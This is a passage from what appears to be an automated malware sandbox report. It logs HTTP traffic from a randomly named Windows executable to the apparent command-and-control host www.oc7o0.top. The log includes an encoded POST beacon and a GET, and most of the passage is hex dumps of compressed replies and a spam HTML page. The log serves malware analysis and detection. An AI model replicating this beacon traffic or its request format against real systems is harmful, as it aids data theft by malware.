                                                                                  Mar 18, 2024 14:47:10.623802900 CET1286INData Raw: fa 47 e1 7d c8 75 df 4c d0 69 77 b7 22 7e b3 f3 45 5d 20 d8 e9 34 07 6c 66 73 b0 0e b1 f9 cd 96 17 75 68 d0 ec f2 3a f5 41 73 00 75 79 0c 7a 37 41 a3 c6 40 00 55 1f d4 19 03 81 3a c4 65 36 d9 f5 2f ea 02 46 bf d9 ec ae 43 82 9d 5e 73 69 23 c2 db
                                                                                  Data Ascii: G}uLiw"~E] 4lfsuh:Asuyz7A@U:e6/FC^si#U|iT9fze*cl61V4cyh kIawLx<n:fq7&O@Ahx76=y`.Y=]
                                                                                  Mar 18, 2024 14:47:10.623815060 CET1286INData Raw: ec 55 22 f6 ed e6 e2 68 5e e3 cc fb 34 e3 58 8a 2c 33 33 e1 e2 6a 37 68 8c a5 34 4f e9 56 12 94 c4 0f 45 b3 58 99 7f 73 e3 28 51 3c cd 6a 3b fc d6 2f 2b 23 14 cf 71 1c 7d c3 1c 77 ad 39 9c e0 39 ee d6 9a 83 4e 1b 1c 11 67 78 9a a0 6f dc b5 5b ea
                                                                                  Data Ascii: U"h^4X,33j7h4OVEXs(Q<j;/+#q}w99Ngxo[}zF>T;tf5!ohoy&0/@dS["HM!0&wAlh~BL^P`hKS6<N"E\H'nho,}atD:xc
                                                                                  Mar 18, 2024 14:47:10.623830080 CET1286INData Raw: bb 8d 66 c4 1e 40 4c e6 36 bd 9a fe 71 5b 91 7f d2 db 83 76 bd 3b f0 3d d2 6e 0f da 10 97 de e1 f1 23 46 3f 0c e8 e8 83 88 1e 71 9b db 11 9b dd 6a fb 1e f9 cf 7f 43 cc ee 36 4f 27 12 d0 77 06 aa 90 8e 3b 6f a5 37 43 d2 f6 36 88 c7 c5 ed 15 79 ec
                                                                                  Data Ascii: f@L6q[v;=n#F?qjC6O'w;o7C6yirD/Xn$FOu,k0iubDm%VL_o+BbXqc)NVb4}yw,LjgA:*`l+d=Gok<vNK8:`(EnDH7
                                                                                  Mar 18, 2024 14:47:10.623894930 CET1286INData Raw: 09 65 38 f1 e5 f4 f8 bf ff fc c3 bf 83 89 49 2d e3 20 45 f7 e5 fd fe 42 f7 94 b8 33 58 29 23 f9 0d 36 9d d5 45 b8 b4 8d e7 31 d2 de 9a 09 43 c8 44 dc 13 f9 89 8e 10 86 86 08 a7 5b 23 88 38 9b fa bd de d8 e2 f1 b4 82 e9 5d 21 7b 2a af be 07 13 13
                                                                                  Data Ascii: e8I- EB3X)#6E1CD[#8]!{*FCn0$Vb'|9pLJ+^1#dA<_ub:t$`nWtOD6#P4i1^Nyi(E25%r%8FcHg^9H~[z
                                                                                  Mar 18, 2024 14:47:10.623908043 CET1286INData Raw: 4a eb fd 51 a5 d8 bd ce 53 8e a3 49 aa ac 8d f3 56 6a 53 3c 5e ea 51 28 eb 28 ba 69 36 20 59 1c bb 6d 4b bd df 89 43 92 14 47 70 b7 a3 de 6b 38 e1 69 8a a1 d8 3b ed e0 a5 d5 f4 db ad b6 3b 0d 39 f7 64 39 4e f2 1c 5b d6 3d 75 17 15 c1 e2 34 4d dc
                                                                                  Data Ascii: JQSIVjS<^Q((i6 YmKCGpk8i;;9d9N[=u4M8Ab,qfiuwN@'s6|1)O;hgve-]sblC>NM]gU7d^Do5=rN_x2=-'4}(k7
                                                                                  Mar 18, 2024 14:47:10.623920918 CET1286INData Raw: cb 54 43 5c ca c4 7a 38 6b 07 da ee 0d 04 c9 52 b0 34 72 0c 72 99 c2 d6 36 78 b3 0b 63 a5 a7 fb 20 71 28 ce a6 0a 67 e3 60 09 56 78 4b 99 0b 98 8b 9f 18 05 30 0e be 00 9b 38 55 4c 85 d5 7e 79 65 1a 8a 8d dd 41 31 95 16 f2 87 bf 84 bb 61 91 da fa
                                                                                  Data Ascii: TC\z8kR4rr6xc q(g`VxK08UL~yeA1aBvog.HH$ZbKS7Dm!0#8/d2ZBn>x3I8>rb2{TY<6AH3RH2BDy+Av.A.mpqy2
                                                                                  Mar 18, 2024 14:47:10.623935938 CET1286INData Raw: 62 f7 e8 ae 6e e6 88 80 2d d4 8e 9a 3a 28 ea 3a fe b1 9b 92 c3 b0 26 1c 66 ee d6 f3 c2 d9 34 8c 88 8c ad 8b 83 c3 1a e9 11 21 3d a4 b9 32 10 d7 e8 10 3c ec f5 78 5e dc 5f 52 7d 96 09 29 bb 05 d6 de c1 9e e0 44 ae 42 16 71 30 4c 20 88 eb 70 a7 dd
                                                                                  Data Ascii: bn-:(:&f4!=2<x^_R})DBq0L pC|TJt6yy='+%S6&%PnP+:>==~"}oy)iD.U(|| No&30~(-$X7K Vrk`00
                                                                                  Mar 18, 2024 14:47:10.623950958 CET1213INData Raw: f5 63 7d cb 0f f5 1c f7 c7 fa 57 6c 3d 4f d5 b7 d0 38 43 e3 38 86 61 2c fc 8a 76 97 6f 68 fa 0d 81 55 6b c8 fe 1f f2 70 9d 6d 10 7a 30 a4 77 eb 8c 1e 17 1a 40 3f 86 9d ae 6f a1 ea 39 16 5e e1 b9 7a ee 55 19 76 b6 be 99 2f 4d a2 99 55 91 f2 f5 cd
                                                                                  Data Ascii: c}Wl=O8C8a,vohUkpmz0w@?o9^zUv/MUW[5Rg7F^hh5wVJzg[2/U*0GxzN[[LV|rYxwdx&|hh^ZFK4A'*jhYiVlU
                                                                                  Mar 18, 2024 14:47:10.623963118 CET20INData Raw: 61 0d 0a 03 00 92 94 d1 a2 4d a5 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: aM0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.1049731104.21.63.135806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:12.978792906 CET1779OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.oc7o0.top
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.oc7o0.top
                                                                                  Referer: http://www.oc7o0.top/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 37 49 33 37 39 30 69 33 79 74 58 68 7a 4c 33 4f 63 4d 77 6a 2b 69 45 58 30 4d 6c 56 2f 62 46 58 79 4f 72 33 6a 62 39 2b 73 66 70 70 7a 62 45 33 79 32 68 34 30 54 76 36 78 47 5a 61 45 53 75 68 78 57 77 34 52 79 4a 50 54 4f 4f 71 4f 50 32 76 36 69 4e 75 4c 70 76 4e 6a 47 46 37 4f 70 79 64 31 73 6b 39 62 2b 38 6a 32 67 4f 58 68 4c 6f 69 38 66 51 55 62 66 36 57 44 63 73 50 70 62 6c 69 4a 51 38 36 43 6d 69 6c 4a 61 55 44 34 53 6b 39 77 36 67 6d 64 77 65 59 6c 57 31 53 66 4e 77 71 38 51 77 4e 73 35 66 2b 55 36 43 37 78 61 79 64 44 51 6b 43 52 49 4c 51 58 69 37 5a 68 59 70 4e 68 70 62 78 57 61 4b 56 55 67 67 56 69 6c 65 67 45 74 72 42 4c 64 70 2f 42 64 52 45 69 48 42 66 6a 37 2f 2f 70 6d 56 62 78 46 4e 7a 66 78 65 64 41 71 4b 43 52 73 61 67 48 78 68 41 4d 4f 65 6d 56 34 57 68 44 59 51 42 6e 56 32 48 31 58 4d 55 69 52 48 34 47 4e 38 34 6f 36 7a 55 45 52 35 4f 4d 33 2b 55 58 41 7a 43 45 45 54 34 49 5a 7a 55 39 67 65 70 63 4a 62 49 74 79 6f 54 42 78 66 39 52 74 54 57 4d 33 4e 71 74 4e 43 72 78 69 31 45 31 53 48 79 72 46 78 4c 77 37 76 7a 47 46 49 54 6c 74 6b 6c 73 5a 77 38 31 4c 52 4c 4d 41 48 45 34 57 38 4c 6f 6c 41 66 51 79 6b 57 72 56 4e 7a 56 6e 2f 38 55 78 6e 71 39 63 67 78 2f 72 42 2b 46 46 6b 79 79 50 73 53 76 43 6f 50 6a 58 68 77 59 48 45 53 65 59 45 7a 61 49 76 4f 2b 56 31 39 78 39 56 62 47 55 66 69 47 45 51 6b 65 74 36 76 42 52 48 44 74 6f 48 6e 59 34 34 63 56 73 72 31 37 37 52 58 73 52 6d 46 35 51 39 33 59 6b 51 6f 76 39 65 58 6c 6c 47 33 78 68 42 66 55 55 59 55 69 37 73 63 7a 77 41 69 39 79 35 35 6c 77 67 4f 38 30 6b 49 52 41 43 38 4c 51 47 67 77 78 64 43 41 70 35 67 56 62 76 63 56 51 5a 4e 50 70 58 61 5a 4d 50 64 4d 49 36 68 64 62 70 65 55 78 43 30 4d 31 7a 75 48 52 54 42 49 59 41 4c 53 51 54 41 52 7a 61 39 51 73 2b 76 71 32 63 6a 4f 78 50 30 75 4a 65 49 2b 4f 31 32 57 48 47 72 57 32 2b 69 49 79 75 57 52 65 65 79 63 5a 43 49 68 7a 73 50 70 64 65 68 4e 5a 49 32 54 36 35 4a 58 54 2b 73 68 46 6a 68 70 46 47 79 77 31 2f 2f 64 4a 2f 53 44 66 39 4c 78 76 63 58 6f 47 33 61 6d 4b 69 79 35 43 74 44 6d 32 6e 47 54 44 50 31 45 39 67 52 4e 74 47 63 42 36 6a 6b 65 54 79 36 58 6c 71 4f 76 2b 55 77 61 75 38 43 42 4d 65 74 42 4a 64 46 30 39 42 4e 34 52 50 71 62 37 6f 78 67 71 74 4f 58 62 32 49 72 54 74 75 5a 54 31 41 35 42 39 48 66 36 34 33 43 68 4b 34 56 55 77 6c 35 36 4c 51 65 4a 48 70 6c 65 55 45 6f 34 75 76 58 6a 62 65 7a 62 69 6a 75 37 43 41 78 45 51 62 6e 39 6b 6e 36 73 69 31 63 31 37 4e 46 66 2b 6c 54 53 34 41 32 54 62 30 6d 75 42 71 35 5a 37 5a 2b 49 59 59 47 74 2f 72 39 2f 61 59 76 58 2f 31 6e 47 37 4b 50 56 42 43 57 4c 57 64 4a 67 2f 65 33 4e 4c 64 43 78 38 31 77 31 46 68 66 6e 53 38 36 48 71 67 70 6f 64 50 35 4d 30 78 51 79 73 45 6f 56 72 6a 4f 34 4f 31 39 39 65 6e 58 65 44 6a 5a 42 73 66 2b 42 79 71 4b 6d 45 2f 47 39 42 39 43 39 37 38 6f 44 39 56 58 4d 52 51 2f 6a 4c 50 58 59 33 4a 54 48 4a 57 72 50 43 53 69 4c 55 7a 73 34 77 64 4e 42 55 66 68 67 69 4c 4f 36 7a 55 6d 75 50 61 4c 4e 50 70 30 46 68 51 53 5a 30 4c 62 6e 45 75 2f 38 53 76 63 30 7a 78 42 6c 4c 66 79 4c 67 67 37 46 7a 70 69 4e 56 41 4b 46 54 57 48 6f 2b 61 32 67 45 74 33 4a 64 58 41 42 42 48 32 35 6b 66 31 62 6e 66 53 73 53 54 76 55 53 65 6d 56 76 51 41 48 34 77 37 75 48 57 63 69 68 53 30 4f 37 39 72 38 41 68 4d 77 30 57 6c 67 62 4e 65 49 65 32 41 4e 73 4d 35 6e 43 33 33 6e 74 43 73 62 36 59 6a 61 69 55 6b 37 75 77 65 47 70 77 79 32 62 50 39 53 64 71 4b 72 52 44 37 6d 2f 46 6c 2b 6e 44 57 6c 73 44 64 37 42 63 55 4e 38 41 51 41 42 70 6e 62 37 4a 71 72 6f 42 33 46 38 67 35 72 6b 36 42 63 45 4e 6a 76 78 42 6d 43 68 4e 38 72 44 33 61 47 4a 54 47 33 72 6f 34 68 31 6f 68 55 4b 38 73 78 34 4f 33 44 75 4c 5a 52 4c 42 52 49 49 4c 37 43 56 42 44 63 45 3d
                                                                                  Data Ascii: bvOt=7I3790i3ytXhzL3OcMwj+iEX0MlV/bFXyOr3jb9+sfppzbE3y2h40Tv6xGZaESuhxWw4RyJPTOOqOP2v6iNuLpvNjGF7Opyd1sk9b+8j2gOXhLoi8fQUbf6WDcsPpbliJQ86CmilJaUD4Sk9w6gmdweYlW1SfNwq8QwNs5f+U6C7xaydDQkCRILQXi7ZhYpNhpbxWaKVUggVilegEtrBLdp/BdREiHBfj7//pmVbxFNzfxedAqKCRsagHxhAMOemV4WhDYQBnV2H1XMUiRH4GN84o6zUER5OM3+UXAzCEET4IZzU9gepcJbItyoTBxf9RtTWM3NqtNCrxi1E1SHyrFxLw7vzGFITltklsZw81LRLMAHE4W8LolAfQykWrVNzVn/8Uxnq9cgx/rB+FFkyyPsSvCoPjXhwYHESeYEzaIvO+V19x9VbGUfiGEQket6vBRHDtoHnY44cVsr177RXsRmF5Q93YkQov9eXllG3xhBfUUYUi7sczwAi9y55lwgO80kIRAC8LQGgwxdCAp5gVbvcVQZNPpXaZMPdMI6hdbpeUxC0M1zuHRTBIYALSQTARza9Qs+vq2cjOxP0uJeI+O12WHGrW2+iIyuWReeycZCIhzsPpdehNZI2T65JXT+shFjhpFGyw1//dJ/SDf9LxvcXoG3amKiy5CtDm2nGTDP1E9gRNtGcB6jkeTy6XlqOv+Uwau8CBMetBJdF09BN4RPqb7oxgqtOXb2IrTtuZT1A5B9Hf643ChK4VUwl56LQeJHpleUEo4uvXjbezbiju7CAxEQbn9kn6si1c17NFf+lTS4A2Tb0muBq5Z7Z+IYYGt/r9/aYvX/1nG7KPVBCWLWdJg/e3NLdCx81w1FhfnS86HqgpodP5M0xQysEoVrjO4O199enXeDjZBsf+ByqKmE/G9B9C978oD9VXMRQ/jLPXY3JTHJWrPCSiLUzs4wdNBUfhgiLO6zUmuPaLNPp0FhQSZ0LbnEu/8Svc0zxBlLfyLgg7FzpiNVAKFTWHo+a2gEt3JdXABBH25kf1bnfSsSTvUSemVvQAH4w7uHWcihS0O79r8AhMw0WlgbNeIe2ANsM5nC33ntCsb6YjaiUk7uweGpwy2bP9SdqKrRD7m/Fl+nDWlsDd7BcUN8AQABpnb7JqroB3F8g5rk6BcENjvxBmChN8rD3aGJTG3ro4h1ohUK8sx4O3DuLZRLBRIIL7CVBDcE=
                                                                                  Mar 18, 2024 14:47:13.235183001 CET1286INHTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:47:13 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iMZE5vuItx4vqThD89Yms7hjHFuxopYn%2FWAxs1%2BB1%2FlF%2BU9LKFP6gEuz%2F2GHxKzgqP8A2XbtsolHaK7w9b5WAAGzhGbnFLUQeWtUEOaQDUaNpzup%2Bk3NmLD%2BOvPGZZEr"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8665ac5e6b2d1982-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Data Raw: 32 61 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 7d 79 73 1b 49 76 e7 ff f3 29 6a d9 41 d3 1b 6e a1 2e d4 45 4b 74 48 2d f5 d8 61 8f 3d b1 6e 8f 77 d7 31 31 81 fb be 01 5e b1 7f 80 07 40 90 04 2f f1 02 09 80 97 78 4a 3c c0 1b c4 41 46 cc 47 e9 ae ac 2a 10 c5 d0 57 d8 c8 2a 90 04 29 4a 16 04 81 ad ee e8 68 41 48 54 d6 2f f3 dd 2f df cb 7e fa 3f 5e fe db 0f 3f fd 9f 3f be 42 ac 41 97 13 f9 e3 7f bc f8 97 7f fa 01 69 7a 82 a2 ff 49 fe 80 a2 2f 7f 7a 89 fc ef 7f fc e9 0f ff 82 e0 1a 0c f9 c9 af 73 07 6c 41 9b c7 ad 73 a2 e8 ab 7f 6d fa 1d 52 f9 a7 c9 1a 0c 7a 5b 51 b4 a3 a3 43 d3 41 6a 3c 7e 0b fa d3 ff 42 3b e1 9c 38 9c a4 f2 f1 49 b0 6a 06 8d 31 68 6c 6a fb dd 53 e5 c5 9d 2e a7 3b f0 ec 81 69 70 8e e3 d4 a7 9b e0 8f 5a 9d 3a b7 e5 59 93 c9 ad 3c 69 d2 19 db 14 0c 4f 5d a6 a0 0e 81 4f 3f 31 f9 42 b6 f6 67 4d 3f 78 dc 41 93 3b f8 e4 a7 2e af a9 09 31 a8 7f 7b d6 14 34 75 06 51 38 db df 23 06 ab ce 1f 30 05 9f 85 82 e6 27 6c 13 5a 99 28 68 0b 3a 4d 6d df 81 b3 23 be 30 cf 67 87 84 c4 b9 98 2a 80 78 44 9c ef 17 06 47 a4 c1 9c 90 1a 04 ab f3 62 3e fd dd 5f c0 e9 1a 5f 4c f1 d9 30 38 3b 92 2e 06 c0 d9 91 98 9f 13 63 59 b0 1e 03 ab f3 20 33 51 7a bd ff 17 29 95 90 92 49 e9 b8 5f da dd 13 8b 13 4f 51 f5 15 55 b8 dd 3a 97 e9 59 93 c3 d4 d5 e1 f1 1b 03 55 68 a5 8b 39 f0 3a 0e 32 63 60 37 0d 76 d3 42 6a 90 cf 87 f9 b3 18 88 e7 40 ec dd f7 df 81 8b 59 a1 ff 02 44 93 60 fc 9d 70 f8 56 da 3d 90 2e 32 62 6a 18 c4 32 20 9a 07 7d c7 42 2c 01 c6 86 c5 f9 7e 71 2a 5f 4a af 7c f7 3d 18 e9 01 c9 24 d8 1f 02 91 4d 90 2c f2 b9 1c 58 dd e0 73 71 61 7b 99 2f cc 4b bb bb d2 ee ae b8 39 2c 0c ad 94 0e 52 62 6a f8 7b 21 bd 09 ce 7a a5 be 22 9f 1d 91 fa 8a a0 38 29 c4 26 a4 70 8f 90 be b8 d9 b3 aa 45 18 4d 01 83 df e6 85 14 ae 5a 87 70 70 28 e4 c6 ef 6d 04 9f cd 81 b3 0b b0 ba 21 8e 6e 81 dd 13 61 6c 9c 3f 4f 0a a9 b0 30 93 f9 25 dc 23 a4 c2 20 b2 79 fd e1 54 1c 3c 93 06 0f 20 0d 3e 98 ea 7d 21 0e c6 e3 c2 ec 89 74 91 80 b4 19 ef 17 37 46 40 e4 1d 18 59 07 6b 03 a5 d9 bc 74 f2 86 cf 0d
                                                                                  Data Ascii: 2a6d}ysIv)jAn.EKtH-a=nw11^@/xJ<AFG*W*)JhAHT//~?^??BAizI/zslAsmRz[QCAj<~B;8Ij1hljS.;ipZ:Y<iO]O?1BgM?xA;.1{4uQ8#0'lZ(h:Mm#0g*xDGb>__L08;.cY 3Qz)I_OQU:YUh9:2c`7vBj@YD`pV=.2bj2 }B,~q*_J|=$M,Xsqa{/K9,Rbj{!z"8)&pEMZpp(m!nal?O0%# yT< >}!t7F@Ykt
                                                                                  Mar 18, 2024 14:47:13.235232115 CET1286INData Raw: ff 12 ee 15 53 c3 f7 1f cc ec 0b e9 b5 07 e1 bd 2f f4 dc 2c d0 69 73 3b 10 bf c9 f9 ac 29 10 ec 72 9a 02 56 93 29 d8 84 58 fd 26 f3 b3 26 34 68 72 79 9d ba a0 29 80 ba 3c 7a 9d 9b a0 50 43 20 80 2a 3f d4 18 02 81 26 c4 65 32 da 74 cf 9a 02 06 bf
                                                                                  Data Ascii: S/,is;)rV)X&&4hry)<zPC *?&e2tnB]^SppA_UM+m*CBUz~]G~;M9)=*Ml@SomzDRpPo=Q4= -G!o` QmOfw
                                                                                  Mar 18, 2024 14:47:13.235313892 CET1286INData Raw: 25 eb 86 98 14 49 92 95 90 47 15 af 0a b1 6f 99 8b a5 38 55 32 ef d3 8c 65 b4 64 95 9b 09 37 57 1d a0 30 46 ab 46 4a b7 9a a0 a2 7e b4 14 83 55 c5 37 37 81 92 96 a3 18 95 c3 6f e3 b2 2a 42 71 2c cb 52 37 c2 71 d7 9b c3 09 8e 65 6f bd 39 18 b4 c1
                                                                                  Data Ascii: %IGo8U2ed7W0FFJ~U77o*Bq,R7qeo9q&\|Xmvy9U;4^oD"lK= X^)02R9Zbq;Y %mJ~?0rJ>DH0`>`j5
                                                                                  Mar 18, 2024 14:47:13.235384941 CET1286INData Raw: e8 dc 16 a4 dd e6 71 9a dc 06 13 62 0b 20 46 53 bb 4e 39 fe 71 5b 90 7f d4 d9 82 36 9d 3b f0 3d d2 61 0b 5a 11 97 ce ee f1 23 06 3f 4c e8 e8 82 88 0e 71 9b 3a 10 ab cd 62 fd 1e f9 8f 7f 45 4c ee 76 4f 17 12 d0 75 05 ea d0 8e 3b eb e2 9b 21 71 7b
                                                                                  Data Ascii: qb FSN9q[6;=aZ#?Lq:bELvOu;!q{$4zgU9f)c6v4b''ijf4PCpJNg"r,V#zDNA>'1uazdcr\`(Y=:C:XHe3D)
                                                                                  Mar 18, 2024 14:47:13.235466003 CET1286INData Raw: b6 97 d9 0c 22 9f a4 e4 e1 d4 97 d3 e3 ff fe d3 0f ff 06 c6 27 d4 13 07 31 b6 2f ed 47 4b 3d 93 c2 ce 60 ad 82 e4 d7 5b 35 16 17 e1 52 19 cf 63 a0 bc 0d 53 86 50 88 d8 47 8a 13 ed 21 0c 0d 11 4e b7 4a 10 61 26 f3 07 9d e1 85 c7 e3 00 53 bb 7c fe
                                                                                  Data Ascii: "'1/GK=`[5RcSPG!NJa&S|TZy<aH^?XOr-^1wqqhPAx Y;[t3~8b#o8jWGZgD._f&_O[Ty;\)
                                                                                  Mar 18, 2024 14:47:13.235584021 CET1286INData Raw: 9a 2b ed 09 38 a1 55 7b 7f 14 2d 76 af f3 94 65 29 52 5b d5 c6 79 ab b5 b5 1c 5e e9 51 a8 ea 28 ba 69 36 20 19 1c bb 6d 4b bd df 89 43 92 5a 96 60 6f 67 bd d7 70 c2 51 5a 5a cb dc 69 07 af ec a6 df 66 b1 de 69 c8 b9 a7 cb 71 92 63 99 aa ee a9 bb
                                                                                  Data Ascii: +8U{-ve)R[y^Q(i6 mKCZ`ogpQZZifiqc(^WcWMOG|us$/vPEH!y$|S`P^^02+$SH$P|PL,xn[CK%>;(L(W>7/J=SZZ:SZ
                                                                                  Mar 18, 2024 14:47:13.235630035 CET1286INData Raw: 9e 9c 8f 2c 4b 7b b9 7a 88 ab 35 32 1e d6 d2 89 76 78 03 41 b2 92 2c 8d 1c 83 42 ae b4 b5 0d de ec c2 5c e9 e9 3e 48 1d 0a 33 99 d2 d9 18 58 84 15 de 62 ee 02 9e c5 8f 8f 00 98 07 9f 87 4d 9c 0a a6 d2 4a 54 5a 9e 82 6a 63 77 50 c8 64 f9 e2 e1 2f
                                                                                  Data Ascii: ,K{z52vxA,B\>H3XbMJTZjcwPd/X6_h^QWwkB20WJAp~*gfd\Nu[Pgvz|.2\aXy(!{.'(nUig3o#(C8e6V^?
                                                                                  Mar 18, 2024 14:47:13.235713005 CET1286INData Raw: 4b a4 90 be a0 6a 0e 8f ee da 66 96 08 58 43 1d a8 b1 53 ab bd ce 7f ec 66 a4 30 ac 09 87 27 77 6b 45 fe 6c 0a 66 44 46 d7 84 c1 61 95 f4 08 9f 1d 52 43 19 88 6b 64 08 5e f6 7a 3c 27 ec 2f 2a 31 cb b8 98 df 02 ab 6f 61 4f 70 aa 50 a3 88 d8 69 3a
                                                                                  Data Ascii: KjfXCSf0'wkElfDFaRCkd^z<'/*1oaOpPi:5iOPWJN?W'.Gxy9%"RJ=*)q9hOz'G<-M Vy;}=O]6uQ5T`{y)3Fiqd?
                                                                                  Mar 18, 2024 14:47:13.235819101 CET1203INData Raw: cb 35 b3 58 f3 ab 1f e1 37 2c fb 27 e5 47 da e6 17 14 4e 53 38 8e 61 18 c3 72 d7 a3 5c 4b db 6f 09 ad 52 45 f6 ff 90 0f 76 3a 60 d5 b8 4c b6 60 48 e7 86 e0 d1 00 fa 10 52 ae f9 c5 0b e5 e5 0f 21 65 29 f8 06 88 14 87 5f c2 0f 9c 32 a4 85 ff 85 1f
                                                                                  Data Ascii: 5X7,'GNS8ar\KoREv:`L`HR!e)_28qa/Umf_y~l~+<Ja)}=+:s[ :y"{auOsF!h=>fVQ%qIp8G
                                                                                  Mar 18, 2024 14:47:13.235867977 CET20INData Raw: 61 0d 0a 03 00 2f d3 d4 9d 0b a4 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: a/0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.1049732104.21.63.135806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:15.585176945 CET495OUTGET /e6xn/?bvOt=2Kfb+Brrh9GrmqPqLtRK/jRr6sBFjt1I8ubTlYZTytp88LF+iTgF/zqvnUYpIzG87louehFzf7+JPcLVzBlhDb38gBs1IrPZ/tUzM/hN1wjivuIhpg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.oc7o0.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:15.840375900 CET1286INHTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:47:15 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFTkrg1f0%2FOz9XnvfUe0QmJb27HhgI6KK%2BzdFTUkbhfnu%2BavWoc73mJY5gPx5wVxC2FISvk78%2FpCcQ94roZ6D7scUIqfumnwFlQK3I4OQylqW675TLD%2BF8NtZiBdtrGz"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8665ac6ead070fa5-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Data Raw: 37 64 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 23 e5 b9 b4 e4 bc 9a e4 b8 8a e6 98 be e7 9c bc e5 8c 85 e7 9a 84 e6 89 8d e8 89 ba e6 9c 89 e5 a4 9a e7 bb 9d 23 5f e5 b7 a5 e4 bd 9c e4 b8 80 e5 b9 b4 e8 bf 87 e5 b9 b4 e7 bb 99 e7 88 b8 e5 a6 88 e5 a4 9a e5 b0 91 e9 92 b1 5f e8 9c 98 e8 9b 9b e8 b5 84 e8 ae af e7 bd 91 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e8 bf 99 e5 92 8c e5 b0 8f e5 ae 9d e5 ae 9d e6 9c 89 e4 bb 80 e4 b9 88 e5 8c ba e5 88 ab 2c 23 e5 bf 97 e6 84 bf e5 86 9b e5 90 ab e6 b3 aa e8 ae b2 e8 bf b0 e7 9c 8b e5 88 b0 e5 86 bb e5 83 b5 e6 88 98 e5 8f 8b e7 9a 84 e7 94 bb e9 9d a2 23 2c e5 8d 81 e5 9b 9b e5 b1 8a e5 85 a8 e5 9b bd e4 ba ba e5 a4 a7 e4 ba 8c e6 ac a1 e4 bc 9a e8 ae ae e8 ae ae e7 a8 8b e6 8a a2 e9 b2 9c e7 9c 8b 2c e6 9d a8 e5 b9 82 e8 83 bd e4 b8 8d e8 83 bd e5 bd 93 e6 88 91 e8 80 81 e6 9d bf 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e6 